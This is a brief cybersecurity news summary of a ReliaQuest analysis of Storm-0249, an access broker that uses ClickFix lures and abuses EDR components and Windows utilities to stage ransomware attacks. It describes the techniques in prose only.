Ransomware IAB abuses EDR for stealthy malware execution www.bleepingcomputer.com/news/secu…
An initial access broker tracked as Storm-0249 is abusing endpoint detection and response solutions and trusted Microsoft Windows utilities to load malware, establish communication, and persistence in preparation for ransomware attacks. In one attack analyzed by researchers at cybersecurity company ReliaQuest, Storm-0249 leveraged the SentinelOne EDR components to hide malicious activity. However, researchers say that the same method works with other EDR products, as well.
ReliaQuest says that the Storm-0249 attack started with ClickFix social engineering that tricked users into pasting and executing curl commands in the Windows Run dialog to download a malicious MSI package with SYSTEM privileges. Once the attacker gains access, they use the SentinelOne component to collect system identifiers through legitimate Windows utilities like reg.exe and findstr.exe, and to funnel encrypted HTTPS command-and-control (C2) traffic. The abuse of trusted, signed EDR processes bypasses nearly all traditional monitoring.
ReliaQuest explains that the compromised systems are profiled using ‘MachineGuid,’ a unique hardware-based identifier that ransomware groups like LockBit and ALPHV use for binding encryption keys to specific victims. This suggests that Storm-0249 conducts initial access compromises tailored to the needs of its typical customers, ransomware affiliates.
